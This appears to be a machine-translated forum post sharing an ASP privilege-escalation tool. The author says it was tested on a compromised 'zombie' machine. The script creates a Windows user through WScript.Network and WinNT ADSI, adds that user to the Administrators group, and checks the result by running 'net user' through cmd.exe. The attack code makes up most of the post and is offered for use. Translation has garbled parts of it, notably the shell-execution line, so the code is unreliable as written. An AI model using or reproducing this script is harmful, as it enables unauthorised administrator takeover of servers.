In fact, Kevin and I tested it on my zombie last week, and the hippo epic. the result is that the Administrator group is successfully added under the user permission (although I can't believe my eyes ).
I did not dare to publish the last time Kevin spoke .... now that he has published the post on his blog, It will be transferred (a little better than I did in the last test, and a form is added ). blessed are You '''
The code is correct, but it rarely succeeds. It depends on luck .. Well, next I want to integrate him into the ocean. Hey.
Program code:
<Head>. Network object script Privilege Escalation Vulnerability exploitation tool <Form action = "useradd. asp" method = post>
User: <input name = "username" type = "text" value = "kevin1986"> <br>
Password: <input name = "passwd" type = "password"> <br>
<Input type = "Submit" value = "">
</Form>
<% @ CodePage = 936
On Error resume next
If request. servervariables ("remote_addr") <> "127.0.0.1" then
Response. Write "ip! S n0t right"
Else
If request ("username") <> "" then
Username = request ("username ")
Passwd = request ("passwd ")
Response. expires = 0
Session. Timeout = 50
Server. scripttimeout = 3000
Set Lp = server. Createobject ("wscript. Network ")
Oz = "winnt: //" & LP. computername
Set Ob = GetObject (OZ)
Set OE = GetObject (OZ & "/administrators, group ")
Set OD = OB. Create ("user", username)
OD. setpassword passwd
OD. setinfo
Oe. Add Oz & "/" & Username
If err then
Response. Write "~~ Do not buy 6 + 1 today ...... Save 2 yuan to buy a bottle of cola ...... "
Else
If instr (server. Createobject ("wscript. Shell" cmd.exe C ("cmd.exe/C net user" & username. stdout. readall), "Last login")> 0 then
Response. Write "although there is no error, it seems that it has not been established successfully. You must be very depressed"
Else
Response. Write "OMG! "& Username &" is an account! This is an unknown vulnerability. 5,000,000 RMB is yours"
End if
End if
Else
Response. Write "Enter the user name"
End if
End if
%>